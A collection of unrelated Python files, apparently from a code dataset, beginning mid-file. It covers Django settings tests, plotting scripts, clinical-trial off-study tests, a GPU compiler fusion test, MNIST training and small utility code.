        self.assertEqual(response.data['platform']['initiatives']['activity_types'], ['event', 'job'])
        self.assertEqual(
            response.data['platform']['initiatives']['activity_search_filters'],
            ['type', 'skill', 'status']
        )
        self.assertEqual(
            response.data['platform']['initiatives']['initiative_search_filters'],
            ['category', 'location']
        )
        self.assertEqual(response.data['platform']['initiatives']['require_organization'], True)
        self.assertEqual(response.data['platform']['initiatives']['contact_method'], 'phone')
        self.assertEqual(response.data['platform']['initiatives']['team_activities'], True)

    def test_notification_platform_settings(self):
        # Create notification platform settings and confirm they end up correctly in settings api
        NotificationPlatformSettings.objects.create(
            share_options=['twitter', 'facebook_at_work'],
            default_yammer_group_id='1234',
            facebook_at_work_url='https://my.facebook.com'
        )
        response = self.client.get(self.settings_url)
        self.assertEqual(response.data['platform']['notifications']['share_options'], ['twitter', 'facebook_at_work'])
        self.assertEqual(response.data['platform']['notifications']['facebook_at_work_url'], 'https://my.facebook.com')
        self.assertEqual(response.data['platform']['notifications']['default_yammer_group_id'], '1234')

    def test_funding_platform_settings(self):
        # Create funding platform settings and confirm they end up correctly in settings api
        FundingPlatformSettings.objects.create(
            allow_anonymous_rewards=True
        )
        response = self.client.get(self.settings_url)
        self.assertEqual(response.data['platform']['funding']['allow_anonymous_rewards'], True)

    def test_member_platform_settings(self):
        # Member settings (incl. GDPR retention windows) are exposed as-is.
        MemberPlatformSettings.objects.create(
            closed=False,
            require_consent=True,
            retention_anonymize=24,
            retention_delete=36
        )
        response = self.client.get(self.settings_url)
        self.assertEqual(response.data['platform']['members']['closed'], False)
        self.assertEqual(response.data['platform']['members']['require_consent'], True)
        self.assertEqual(response.data['platform']['members']['retention_anonymize'], 24)
        self.assertEqual(response.data['platform']['members']['retention_delete'], 36)

    def test_member_platform_settings_closed(self):
        # On a closed platform an authenticated member still sees the
        # member settings.
        MemberPlatformSettings.objects.create(
            closed=True,
            require_consent=True,
            consent_link="example.com"
        )
        user = BlueBottleUserFactory.create()
        user_token = "JWT {0}".format(user.get_jwt_token())
        response = self.client.get(self.settings_url, token=user_token)
        self.assertEqual(response.data['platform']['members']['closed'], True)
        self.assertEqual(response.data['platform']['members']['require_consent'], True)
        self.assertEqual(response.data['platform']['members']['consent_link'], 'example.com')

    def test_member_platform_settings_closed_anonymous(self):
        # On a closed platform an anonymous visitor only gets the reduced
        # member/content payloads asserted below (no retention fields etc.).
        MemberPlatformSettings.objects.create(
            closed=True,
            require_consent=True,
            consent_link="example.com"
        )
        response = self.client.get(self.settings_url)
        content = {
            'contact_email': None,
            'contact_phone': None,
            'copyright': None,
            'powered_by_link': None,
            'powered_by_logo': None,
            'powered_by_text': None,
            'metadata_title': None,
            'metadata_description': None,
            'metadata_keywords': None,
            'start_page': None,
            'logo': None,
            'favicons': {
                'large': '',
                'small': ''
            },
            'action_color': None,
            'action_text_color': '#ffffff',
            'alternative_link_color': None,
            'description_color': None,
            'description_text_color': '#ffffff',
            'footer_color': '#3b3b3b',
            'footer_text_color': '#ffffff',
            'title_font': None,
            'body_font': None,
            'footer_banner': None,
        }
        members = {
            'closed': True,
            'background': '',
            'login_methods': ['password'],
            'session_only': False,
            'consent_link': 'example.com',
            'email_domain': None,
            'confirm_signup': False
        }
        self.assertEqual(response.data['platform']['members'], members)
        self.assertEqual(response.data['platform']['content'], content)

    def test_member_platform_required_settings(self):
        MemberPlatformSettings.objects.create(
            require_office=True,
            verify_office=False
        )
        response = self.client.get(self.settings_url)
        self.assertEqual(response.data['platform']['members']['require_office'], True)
        self.assertEqual(response.data['platform']['members']['verify_office'], False)
|
20,714 | 9b2787109b9607cb5ad474cf33f42e969857f97d | import csv
from matplotlib import pyplot as plt
# Plot daily high/low temperatures and the high-low spread from the Sitka
# 2018 weather CSV export.
filename = 'sitka_weather_2018_simple.csv'

highs = []   # daily high temperature (F)
lows = []    # daily low temperature (F)  (renamed from `min`, which shadowed the builtin)
deltas = []  # daily high - low spread (F)

with open(filename) as f:
    reader = csv.reader(f)
    header_row = next(reader)
    print(header_row)
    # Print column indices so the row[5]/row[6] picks below are auditable.
    for index, column_header in enumerate(header_row):
        print(index, column_header)
    for row in reader:
        # NOTE(review): assumes column 5 = TMAX and column 6 = TMIN —
        # confirm against the printed header.
        low = int(row[6])
        lows.append(low)
        high = int(row[5])
        highs.append(high)
        deltas.append(high - low)

print(highs)

fig = plt.figure(dpi=128, figsize=(10, 6))
plt.plot(highs, c='red')
plt.plot(lows, c='blue')
plt.plot(deltas, c='black')
# Bug fix: the title said "July 2014" but the file holds Sitka 2018 data.
plt.title("Daily high temperatures, 2018", fontsize=24)
plt.xlabel('', fontsize=16)
plt.ylabel("Temperature (F)", fontsize=16)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.show()
20,715 | bbf0f7711db7627c29b7811aeaeed1b19154f54b | import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from removeZero import removeZero
### Plot Salary Distribution for each Year
### Import CSV file
df = pd.read_csv('salary_gscholar_Washington.csv')
# Drop rows with any missing values, then renumber the index.
df.dropna(how='any', inplace=True)
df = df.reset_index()
# removeZero splits the frame into per-year frames with zero rows removed.
df_2012, df_2013, df_2014, df_2015, df_2016 = removeZero(df)
##f, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = plt.subplots(2,3, sharex=True)
##
##sns.distplot(df_2012['2012'], ax=ax1)
##sns.distplot(df_2013['2013'], ax=ax2)
##sns.distplot(df_2014['2014'], ax=ax3)
##sns.distplot(df_2015['2015'], ax=ax4)
##sns.distplot(df_2016['2016'], ax=ax5)
##plt.setp(ax4.get_xticklabels(), rotation=90)
##plt.setp(ax5.get_xticklabels(), rotation=90)
##plt.setp(ax6.get_xticklabels(), rotation=90)
##
##
##plt.show()
# 2x3 grid of citation-metric distributions; the sixth axis is left empty.
f, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = plt.subplots(2, 3, sharex=False)
# NOTE(review): each metric is drawn from a *different* year-split frame
# (e.g. 'h-index' from df_2013, 'i10-index' from df_2015) — verify this
# pairing is intentional and not a copy-paste of the year plots above.
sns.distplot(df_2012['Total Citations'], ax=ax1)
sns.distplot(df_2013['h-index'], ax=ax2)
sns.distplot(df_2014['5 year h-index'], ax=ax3)
sns.distplot(df_2015['i10-index'], ax=ax4)
sns.distplot(df_2016['5 year i10-index'], ax=ax5)
##plt.setp(ax4.get_xticklabels(), rotation=90)
##plt.setp(ax5.get_xticklabels(), rotation=90)
##plt.setp(ax6.get_xticklabels(), rotation=90)
plt.show()
20,716 | 35bf0be61a60de2b865d97c2fb3893dd726e6a76 | from dateutil.relativedelta import relativedelta
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase, tag
from edc_appointment.models import Appointment
from edc_appointment.tests.models import (
OffScheduleOne,
SubjectConsent,
SubjectOffstudy,
SubjectVisit,
)
from edc_appointment.tests.visit_schedule import visit_schedule1, visit_schedule2
from edc_consent import NotConsentedError, site_consents
from edc_constants.constants import DEAD
from edc_facility.import_holidays import import_holidays
from edc_utils import get_dob, get_utcnow
from edc_visit_schedule.site_visit_schedules import site_visit_schedules
from edc_visit_tracking.constants import SCHEDULED
from ..utils import OffstudyError
from .consents import v1_consent
from .forms import BadNonCrfOneForm, CrfOneForm, NonCrfOneForm, SubjectOffstudyForm
from .models import BadNonCrfOne, CrfOne, NonCrfOne
class TestOffstudy(TestCase):
    """Tests for the off-study machinery: a subject must be taken off all
    schedules before an off-study report is allowed, and no CRF/non-CRF data
    may be reported after the off-study date."""

    @classmethod
    def setUpClass(cls):
        site_consents.register(v1_consent)
        import_holidays()
        return super().setUpClass()

    @classmethod
    def tearDownClass(cls):
        super().tearDownClass()

    def setUp(self):
        self.visit_schedule_name = "visit_schedule1"
        self.schedule_name = "schedule1"
        # Reset the global visit-schedule registry so each test starts clean.
        site_visit_schedules._registry = {}
        site_visit_schedules.loaded = False
        site_visit_schedules.register(visit_schedule1)
        site_visit_schedules.register(visit_schedule2)
        self.schedule1 = visit_schedule1.schedules.get("schedule1")
        self.schedule2 = visit_schedule2.schedules.get("schedule2")
        self.subject_identifier = "111111111"
        self.subject_identifiers = [
            self.subject_identifier,
            "222222222",
            "333333333",
            "444444444",
        ]
        # Consent each subject 4 weeks ago and put them on schedule1.
        self.consent_datetime = get_utcnow() - relativedelta(weeks=4)
        dob = get_dob(age_in_years=25, now=self.consent_datetime)
        for subject_identifier in self.subject_identifiers:
            subject_consent = SubjectConsent.objects.create(
                subject_identifier=subject_identifier,
                identity=subject_identifier,
                confirm_identity=subject_identifier,
                consent_datetime=self.consent_datetime,
                dob=dob,
            )
            self.schedule1.put_on_schedule(
                subject_identifier=subject_consent.subject_identifier,
                onschedule_datetime=self.consent_datetime,
            )
        self.subject_consent = SubjectConsent.objects.get(
            subject_identifier=self.subject_identifier, dob=dob
        )

    def test_offstudy_model(self):
        # Off-study is rejected while the subject is still on schedule ...
        self.assertRaises(
            OffstudyError,
            SubjectOffstudy.objects.create,
            subject_identifier=self.subject_identifier,
            offstudy_datetime=(
                self.consent_datetime + relativedelta(days=1) + relativedelta(minutes=1)
            ),
        )
        # ... and accepted once the subject is taken off schedule first.
        OffScheduleOne.objects.create(
            subject_identifier=self.subject_identifier,
            report_datetime=get_utcnow(),
            offschedule_datetime=self.consent_datetime + relativedelta(days=1),
        )
        obj = SubjectOffstudy.objects.create(
            subject_identifier=self.subject_identifier,
            offstudy_datetime=(
                self.consent_datetime + relativedelta(days=1) + relativedelta(minutes=1)
            ),
        )
        self.assertTrue(str(obj))

    def test_offstudy_cls_subject_not_registered_by_offstudy_date(self):
        # An off-study date before the subject's consent raises
        # NotConsentedError.
        OffScheduleOne.objects.create(
            subject_identifier=self.subject_identifier,
            report_datetime=get_utcnow(),
            offschedule_datetime=self.consent_datetime + relativedelta(days=1),
        )
        self.assertRaises(
            NotConsentedError,
            SubjectOffstudy.objects.create,
            subject_identifier=self.subject_identifier,
            offstudy_datetime=self.consent_datetime - relativedelta(days=1),
        )

    def test_update_subject_visit_report_date_after_offstudy_date(self):
        # Moving an existing visit's report date past the off-study date
        # must be rejected on save.
        appointments = Appointment.objects.filter(
            subject_identifier=self.subject_identifier
        ).order_by("appt_datetime")
        appointment_datetimes = [appointment.appt_datetime for appointment in appointments]
        # report visits for first and second appointment, 1, 2
        for index, appointment in enumerate(appointments[0:2]):
            SubjectVisit.objects.create(
                appointment=appointment,
                visit_schedule_name=appointment.visit_schedule_name,
                schedule_name=appointment.schedule_name,
                visit_code=appointment.visit_code,
                report_datetime=appointment_datetimes[index],
                study_status=SCHEDULED,
            )
        OffScheduleOne.objects.create(
            subject_identifier=self.subject_identifier,
            report_datetime=get_utcnow(),
            offschedule_datetime=appointment_datetimes[1],
        )
        # report off study on same date as second visit
        visit_schedule1.offstudy_model_cls.objects.create(
            subject_identifier=self.subject_identifier,
            offstudy_datetime=appointment_datetimes[1],
            offstudy_reason=DEAD,
        )
        subject_visit = SubjectVisit.objects.all().order_by("report_datetime").last()
        subject_visit.report_datetime = subject_visit.report_datetime + relativedelta(years=1)
        self.assertRaises(OffstudyError, subject_visit.save)

    def test_crf_model_mixin(self):
        # A CRF saves on/before the off-study date but raises after it.
        # get subject's appointments
        appointments = Appointment.objects.filter(
            subject_identifier=self.subject_identifier
        ).order_by("appt_datetime")
        # get first appointment
        # get first visit
        subject_visit = SubjectVisit.objects.create(
            appointment=appointments[0],
            visit_schedule_name=appointments[0].visit_schedule_name,
            schedule_name=appointments[0].schedule_name,
            visit_code=appointments[0].visit_code,
            report_datetime=appointments[0].appt_datetime,
            study_status=SCHEDULED,
        )
        # get crf_one for this visit
        crf_one = CrfOne(
            subject_visit=subject_visit, report_datetime=appointments[0].appt_datetime
        )
        crf_one.save()
        # get second appointment
        # create second visit
        subject_visit = SubjectVisit.objects.create(
            appointment=appointments[1],
            visit_schedule_name=appointments[1].visit_schedule_name,
            schedule_name=appointments[1].schedule_name,
            visit_code=appointments[1].visit_code,
            report_datetime=appointments[1].appt_datetime,
            study_status=SCHEDULED,
        )
        # take off schedule1
        OffScheduleOne.objects.create(
            subject_identifier=self.subject_identifier,
            report_datetime=get_utcnow(),
            offschedule_datetime=appointments[1].appt_datetime,
        )
        # create complete off-study form for 1 hour after
        # first visit date
        SubjectOffstudy.objects.create(
            offstudy_datetime=appointments[1].appt_datetime,
            subject_identifier=self.subject_identifier,
        )
        # show CRF saves OK
        crf_one = CrfOne(
            report_datetime=appointments[1].appt_datetime, subject_visit=subject_visit
        )
        try:
            crf_one.save()
        except OffstudyError as e:
            self.fail(f"OffstudyError unexpectedly raised. Got {e}")
        crf_one.report_datetime = crf_one.report_datetime + relativedelta(years=1)
        self.assertRaises(OffstudyError, crf_one.save)

    def test_non_crf_model_mixin(self):
        # Same contract for non-CRF models keyed by subject_identifier.
        non_crf_one = NonCrfOne.objects.create(
            subject_identifier=self.subject_identifier,
            report_datetime=self.consent_datetime,
        )
        # take off schedule1
        OffScheduleOne.objects.create(
            subject_identifier=self.subject_identifier,
            report_datetime=get_utcnow(),
            offschedule_datetime=(self.consent_datetime + relativedelta(hours=1)),
        )
        SubjectOffstudy.objects.create(
            offstudy_datetime=self.consent_datetime + relativedelta(hours=1),
            subject_identifier=self.subject_identifier,
        )
        try:
            non_crf_one.save()
        except OffstudyError as e:
            self.fail(f"OffstudyError unexpectedly raised. Got {e}")
        non_crf_one.report_datetime = non_crf_one.report_datetime + relativedelta(years=1)
        self.assertRaises(OffstudyError, non_crf_one.save)

    def test_bad_non_crf_model_mixin(self):
        # A model using the mixin without the required configuration raises
        # ImproperlyConfigured on create.
        self.assertRaises(
            ImproperlyConfigured,
            BadNonCrfOne.objects.create,
            subject_identifier=self.subject_identifier,
        )

    def test_modelform_mixin_ok(self):
        data = dict(
            subject_identifier=self.subject_identifier,
            offstudy_datetime=get_utcnow(),
            offstudy_reason=DEAD,
        )
        # take off schedule1
        OffScheduleOne.objects.create(
            subject_identifier=self.subject_identifier,
            report_datetime=get_utcnow(),
            offschedule_datetime=(self.consent_datetime + relativedelta(hours=1)),
        )
        form = SubjectOffstudyForm(data=data)
        self.assertTrue(form.is_valid())

    def test_offstudy_modelform(self):
        # Form validation mirrors the model: invalid while on schedule,
        # valid after the subject is taken off schedule.
        data = dict(
            subject_identifier=self.subject_identifier,
            offstudy_datetime=get_utcnow(),
            offstudy_reason=DEAD,
        )
        form = SubjectOffstudyForm(data=data)
        self.assertFalse(form.is_valid())
        self.assertIn("Subject is on schedule on this date", str(form.errors))
        # take off schedule1
        OffScheduleOne.objects.create(
            subject_identifier=self.subject_identifier,
            report_datetime=get_utcnow(),
            offschedule_datetime=(self.consent_datetime + relativedelta(hours=1)),
        )
        form = SubjectOffstudyForm(data=data)
        self.assertTrue(form.is_valid())

    def test_crf_modelform_ok(self):
        # CRF form is valid up to the off-study date, invalid after it.
        appointments = Appointment.objects.filter(
            subject_identifier=self.subject_identifier
        ).order_by("appt_datetime")
        subject_visit = SubjectVisit.objects.create(
            appointment=appointments[0],
            visit_schedule_name=appointments[0].visit_schedule_name,
            schedule_name=appointments[0].schedule_name,
            visit_code=appointments[0].visit_code,
            report_datetime=appointments[0].appt_datetime,
            study_status=SCHEDULED,
        )
        data = dict(
            subject_visit=str(subject_visit.id),
            report_datetime=appointments[0].appt_datetime,
        )
        form = CrfOneForm(data=data)
        self.assertTrue(form.is_valid())
        # take off schedule1
        OffScheduleOne.objects.create(
            subject_identifier=self.subject_identifier,
            report_datetime=get_utcnow(),
            offschedule_datetime=(appointments[0].appt_datetime + relativedelta(hours=1)),
        )
        SubjectOffstudy.objects.create(
            offstudy_datetime=appointments[0].appt_datetime + relativedelta(hours=1),
            subject_identifier=self.subject_identifier,
        )
        form = CrfOneForm(data=data)
        self.assertTrue(form.is_valid())
        data = dict(
            subject_visit=str(subject_visit.id),
            report_datetime=appointments[0].appt_datetime + relativedelta(hours=2),
        )
        form = CrfOneForm(data=data)
        self.assertFalse(form.is_valid())
        self.assertIn("Report date comes after subject", str(form.errors))

    def test_non_crf_modelform(self):
        data = dict(
            subject_identifier=self.subject_identifier,
            report_datetime=self.consent_datetime,
        )
        form = NonCrfOneForm(data=data)
        self.assertTrue(form.is_valid())
        # take off schedule1
        OffScheduleOne.objects.create(
            subject_identifier=self.subject_identifier,
            report_datetime=get_utcnow(),
            offschedule_datetime=(self.consent_datetime + relativedelta(hours=1)),
        )
        SubjectOffstudy.objects.create(
            subject_identifier=self.subject_identifier,
            offstudy_datetime=(self.consent_datetime + relativedelta(hours=1)),
        )
        form = NonCrfOneForm(data=data)
        self.assertTrue(form.is_valid())
        data = dict(
            subject_identifier=self.subject_identifier,
            report_datetime=self.consent_datetime + relativedelta(hours=2),
        )
        form = NonCrfOneForm(data=data)
        self.assertFalse(form.is_valid())
        self.assertIn("Report date comes after subject", str(form.errors))

    def test_bad_non_crf_modelform(self):
        data = dict(
            subject_identifier=self.subject_identifier,
            report_datetime=self.consent_datetime,
        )
        form = BadNonCrfOneForm(data=data)
        self.assertRaises(ImproperlyConfigured, form.is_valid)
|
20,717 | 7cf5b357906abcb7500974393b3a2d9b564f4889 | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unittests for elementwise fusion out-of-order cases.
"""
import unittest
import torch
from aitemplate.compiler import compile_model, ops
from aitemplate.compiler.ops.common.epilogue import FuncEnum
from aitemplate.frontend import Tensor
from aitemplate.testing import detect_target
from aitemplate.testing.test_utils import (
filter_test_cases_by_params,
get_random_torch_tensor,
get_torch_empty_tensor,
TestEnv,
)
from parameterized import parameterized
from torch import nn
class FusedElementwiseOutOfOrderTestCase(unittest.TestCase):
    """Verifies fused-elementwise codegen when fusion forces the graph's
    tensor ordering to be re-adjusted around interleaved gemms."""

    @parameterized.expand(
        **filter_test_cases_by_params(
            {
                TestEnv.CUDA_LESS_THAN_SM80: [("float16")],
                TestEnv.CUDA_SM80: [("float")],
            }
        )
    )
    def test_fused_elementwise_out_of_order(self, dtype):
        r"""
        X0   X1
          \  /
         Add_1        Gemm_2(X2, X4)
           |      \     /
        Gemm_1(X3)  Sub_1
           |          |
           |      Gemm_3(X4)
            \        /
              Sub_2
        Add_1 and Sub_1 will be fused together.
        However tensor order needs to be re-adjusted.
        Original order:
        [X0, X1, R0, X3, R1, X2, X4, R2, R3, R4, R5]
        New order:
        [X2, X4, R2, X0, X1, R0, X3, R1, R3, R4, R5]
        """
        target = detect_target()
        # float32 gemms need SM80+ CUDA hardware; ROCm is excluded.
        if dtype == "float" and (int(target._arch) < 80 or target.name == "rocm"):
            self.skipTest("gemm with float tensors requires CUDA sm >= 80")
        M = 10
        K = 4
        N = 4
        # Graph inputs. X1 is a scalar constant (value=3.0), not a runtime input.
        X0 = Tensor(
            shape=[M, K],
            dtype=dtype,
            name="X0",
            is_input=True,
        )
        X1 = Tensor(
            shape=[],
            dtype=dtype,
            name="X1",
            value=3.0,
        )
        X2 = Tensor(
            shape=[M, K],
            dtype=dtype,
            name="X2",
            is_input=True,
        )
        X3 = Tensor(
            shape=[K, N],
            dtype=dtype,
            name="X3",
            is_input=True,
        )
        X4 = Tensor(
            shape=[K, N],
            dtype=dtype,
            name="X4",
            is_input=True,
        )
        # Build the graph exactly as in the diagram above.
        R0 = ops.elementwise(FuncEnum.ADD)(X0, X1)
        R1 = ops.gemm_rcr()(R0, X3)
        R2 = ops.gemm_rcr()(X2, X4)
        R3 = ops.elementwise(FuncEnum.SUB)(R0, R2)
        R4 = ops.gemm_rcr()(R3, X4)
        R5 = ops.elementwise(FuncEnum.SUB)(R1, R4)
        R5._attrs["name"] = "R5"
        R5._attrs["is_output"] = True
        module = compile_model(
            R5,
            target,
            "./tmp",
            f"fused_elementwise_out_of_order_{dtype}",
        )
        # Reference computation in PyTorch (gemm_rcr matches F.linear: y = x @ w^T).
        x0_pt = get_random_torch_tensor([M, K], dtype)
        x2_pt = get_random_torch_tensor([M, K], dtype)
        x3_pt = get_random_torch_tensor([K, N], dtype)
        x4_pt = get_random_torch_tensor([K, N], dtype)
        r0_pt = x0_pt + 3
        r1_pt = nn.functional.linear(r0_pt, x3_pt)
        r2_pt = nn.functional.linear(x2_pt, x4_pt)
        r3_pt = r0_pt - r2_pt
        r4_pt = nn.functional.linear(r3_pt, x4_pt)
        r5_pt = r1_pt - r4_pt
        r5 = get_torch_empty_tensor([M, N], dtype)
        # Feed inputs by the compiled module's own input ordering, which may
        # differ from graph construction order (the point of this test).
        input_name_to_idx_mapping = module.get_input_name_to_index_map()
        inputs = [None] * len(input_name_to_idx_mapping)
        input_name_to_pt_mapping = {
            "X0": x0_pt,
            "X2": x2_pt,
            "X3": x3_pt,
            "X4": x4_pt,
        }
        for input_name, pt in input_name_to_pt_mapping.items():
            inputs[input_name_to_idx_mapping[input_name]] = pt
        module.run_with_tensors(inputs, [r5])
        self.assertTrue(torch.allclose(r5, r5_pt, atol=1e-2, rtol=1e-2))

    def test_fused_elementwise_out_of_order_with_size(self):
        # Placeholder — not yet implemented.
        pass
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
20,718 | 17cd28cc8b4479a398c9eb5484f9f20ffb527a5c | #encoding:utf-8
__authors__ = ['"Liu Fei" <fei.liu@cs2c.com.cn>']
__version__ = "V0.1"
'''
# ChangeLog:
#---------------------------------------------------------------------------------
# Version Date Desc Author
#---------------------------------------------------------------------------------
# V0.1 2014/10/17 初始版本 Liu Fei
#---------------------------------------------------------------------------------
'''
'''-----------------------------------------------------------------------------------------
@note: Pre-TestData
-----------------------------------------------------------------------------------------'''
from Configs import GlobalConfig
host = GlobalConfig.Hosts['node1']
'''-----------------------------------------------------------------------------------------
@note: Test-Data
-----------------------------------------------------------------------------------------'''
# Host name cases: (1) contains special characters; (2) exceeds 255 characters.
# NOTE(review): the password below is presumably deliberately wrong so that
# SSH authentication fails and the 409 fault below is returned — confirm.
password = 'abcdefghijklmn'
xml_host_info = '''
<host>
<name>node-ITC03010306</name>
<address>%s</address>
<root_password>%s</root_password>
</host>
''' % (host['ip'], password)
'''-----------------------------------------------------------------------------------------
@note: Post-TestData
-----------------------------------------------------------------------------------------'''
'''-----------------------------------------------------------------------------------------
@note: ExpectedResult
-----------------------------------------------------------------------------------------'''
# Expected REST response: 409 Conflict with an SSH-authentication fault body.
expected_status_code = 409
expected_info ='''
<fault>
<reason>Operation Failed</reason>
<detail>[Cannot add Host. SSH authentication failed, verify authentication parameters are correct (Username/Password, public-key etc.) You may refer to the engine.log file for further details.]</detail>
</fault>
'''
20,719 | 924d9a668cc1653dec9038da04bdbcec7dfc4a2c | m=input().split()
# NOTE(review): the original line built the tuple (int, tokens) — almost
# certainly a mistyped map(). Converted to a list of ints; `n` is still
# unused afterwards (the print below uses `m`), so confirm which minimum
# was actually intended.
n = list(map(int, input().split()))
print(min(m))
|
20,720 | 5326b8a28175c88ebb6053db40838446d2085560 | import MyMNIST as mnist
import torch
from torch import nn
import numpy as np
from torch.utils.data.sampler import SubsetRandomSampler
from torch.utils.data import DataLoader
from torch import optim
import matplotlib.pyplot as plt
import pickle
import NeuralNetwork as mynn
import MyMNIST as mnist
class NeuralNetwork(nn.Module):
    """Single-hidden-layer MLP: linear -> sigmoid -> linear."""

    def __init__(self, input, hidden, output):
        # `input` mirrors the original signature (callers may pass by keyword);
        # attribute names are kept so saved state_dicts stay compatible.
        super().__init__()
        self.hiddenLayer = nn.Linear(input, hidden)
        self.outputLayer = nn.Linear(hidden, output)

    def forward(self, x):
        # Sigmoid non-linearity between the two affine maps; raw logits out.
        return self.outputLayer(torch.sigmoid(self.hiddenLayer(x)))
if __name__ == '__main__':
    # 1. Model configuration and dataset.
    print("loading data ...")
    mnistTrain = mnist.MyMNIST(train=True)
    layers = [28 * 28, 150, 10]
    activationArr = ['sigmoid', 'tanh', 'relu']
    # 2. Samplers and data loaders: sequential 80/20 train/validation split.
    split = int(0.8 * len(mnistTrain))
    idxArr = np.arange(len(mnistTrain))
    trainIdx, valIdx = idxArr[:split], idxArr[split:]
    trainSampler = SubsetRandomSampler(trainIdx)
    valSampler = SubsetRandomSampler(valIdx)
    trainLoader = DataLoader(mnistTrain, batch_size=256, sampler=trainSampler)
    validLoader = DataLoader(mnistTrain, batch_size=256, sampler=valSampler)
    # 3. Loss and experiment logger shared by all models.
    lossFunction = nn.CrossEntropyLoss()
    trainLogger = mnist.TrainLogger("MNIST classifiers")
    # Train one model per activation function and compare them.
    for idx, actFunct in enumerate(activationArr):
        model = mynn.NeuralNetwork(layers, actFunct)
        optimizer = optim.SGD(params=model.parameters(), lr=0.1, weight_decay=1e-6, momentum=0.9, nesterov=True)
        modelName = actFunct + '_nn'
        trainLogger.addModelInfo(modelName)
        valAccuracyHistory = []
        trLossHistory = []
        print("training {} model ...".format(modelName))
        # 4. Train / validate loop.
        for epoch in range(50):
            for x, y in trainLoader:
                optimizer.zero_grad()
                yHat = model(x)
                loss = lossFunction(yHat, y)
                loss.backward()
                optimizer.step()
            # Only the last batch loss of the epoch is recorded.
            trLossHistory.append(loss.item())
            correct = 0
            total = 0
            for x, y in validLoader:
                z = model(x)
                yHat = z.argmax(1)
                correct += (yHat == y).sum().item()
                total += y.shape[0]
            accuracy = correct / total
            valAccuracyHistory.append(accuracy)
            # Fixed: the original printed this exact line twice per epoch.
            print("Accuracy in validation in epoch {:d} set: {:.6f}".format(epoch, accuracy))
        torch.save(model.state_dict(), './_DiffActivationComp/' + modelName + '.pt')
        # Record training information for this model in the logger.
        trainLogger.dict[modelName]['layers'] = layers
        trainLogger.dict[modelName]['activation'] = actFunct
        trainLogger.dict[modelName]['trainLoss'] = trLossHistory
        trainLogger.dict[modelName]['validationAccuracy'] = valAccuracyHistory
    with open('./_DiffActivationComp/' + 'trainLogger' + '_log.pt', 'wb') as outFile:
        pickle.dump(trainLogger.dict, outFile)
    # 5. Plot loss / accuracy curves for all trained models.
    fig, axes = plt.subplots(2, 1)
    for modelName in trainLogger.dict.keys():
        trLossHistory = trainLogger.dict[modelName]['trainLoss']
        valAccuracyHistory = trainLogger.dict[modelName]['validationAccuracy']
        axes[0].plot(trLossHistory, label=modelName)
        axes[1].plot(valAccuracyHistory, label=modelName)
    axes[0].legend()
    axes[1].legend()
    plt.show()
    print("Finish")
|
20,721 | 882a17a76c79508c75e618b3b86cb5f191830cdb | from transaction import Transaction
class RoomManagement:
    """Thin data-access layer for room lookups and room claiming."""

    def set_room_not_available(self, transaction: Transaction, params):
        """Mark a room as claimed by a user.

        The update is guarded by conditions requiring the room to still be
        'available' with no userId — presumably to prevent double-booking;
        confirm against the Transaction implementation.
        """
        new_values = {
            'id': params['roomNumber'],
            'userId': params['userId'],
            'status': 'not_available',
        }
        guard = {
            'id': params['roomNumber'],
            'userId': None,
            'status': 'available',
        }
        transaction.start_action(
            transaction.update,
            {
                'entity_name': 'rooms',
                'set_values': new_values,
                'conditions': guard,
            }
        )

    def get_rooms(self, transaction: Transaction):
        """Return every room, regardless of status."""
        return transaction.select('rooms', {})

    def get_available_rooms(self, transaction: Transaction):
        """Return only the rooms whose status is 'available'."""
        available_filter = {'status': 'available'}
        return transaction.select('rooms', available_filter)
|
20,722 | 62c1d3b6aab1910b06861036065199a95759856d | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2020 sungminoh <smoh2044@gmail.com>
#
# Distributed under terms of the MIT license.
"""
Given two strings s and t, return true if they are equal when both are typed into empty text editors. '#' means a backspace character.
Note that after backspacing an empty text, the text will continue empty.
Example 1:
Input: s = "ab#c", t = "ad#c"
Output: true
Explanation: Both s and t become "ac".
Example 2:
Input: s = "ab##", t = "c#d#"
Output: true
Explanation: Both s and t become "".
Example 3:
Input: s = "a#c", t = "b"
Output: false
Explanation: s becomes "c" while t becomes "b".
Constraints:
1 <= s.length, t.length <= 200
s and t only contain lowercase letters and '#' characters.
Follow up: Can you solve it in O(n) time and O(1) space?
"""
import sys
import pytest
class Solution:
    def backspaceCompare(self, s: str, t: str) -> bool:
        """Return True if s and t are equal after applying '#' backspaces.

        Scans both strings right-to-left with a pending-backspace counter
        per string: O(len(s) + len(t)) time, O(1) extra space.
        """
        si, ti = len(s) - 1, len(t) - 1
        skip_s = skip_t = 0
        while si >= 0 or ti >= 0:
            if si >= 0 and s[si] == '#':
                skip_s += 1
                si -= 1
            elif skip_s > 0:
                # Consume one character deleted by a backspace in s.
                skip_s -= 1
                si -= 1
            elif ti >= 0 and t[ti] == '#':
                skip_t += 1
                ti -= 1
            elif skip_t > 0:
                skip_t -= 1
                ti -= 1
            elif si >= 0 and ti >= 0 and s[si] == t[ti]:
                # Both current characters survive and match; step past them.
                si -= 1
                ti -= 1
            else:
                # One side ran out early, or surviving characters differ.
                return False
        return True
# Parametrized pytest cases mirroring the three examples in the docstring.
@pytest.mark.parametrize('s, t, expected', [
    ("ab#c", "ad#c", True),
    ("ab##", "c#d#", True),
    ("a#c", "b", False),
])
def test(s, t, expected):
    assert expected == Solution().backspaceCompare(s, t)
if __name__ == '__main__':
    # Running this file directly delegates to pytest with verbose output.
    sys.exit(pytest.main(["-s", "-v"] + sys.argv))
|
20,723 | 076e61ed2fb170c66bf410739f9eaae6e5157041 | from enum import Enum
import time
import math
# Character classes used by clear_string() and the extraction helpers below.
rus_letters = "абвгдеёжзийклмнопрстуфхцчшщъыьэюя"  # lowercase Russian alphabet
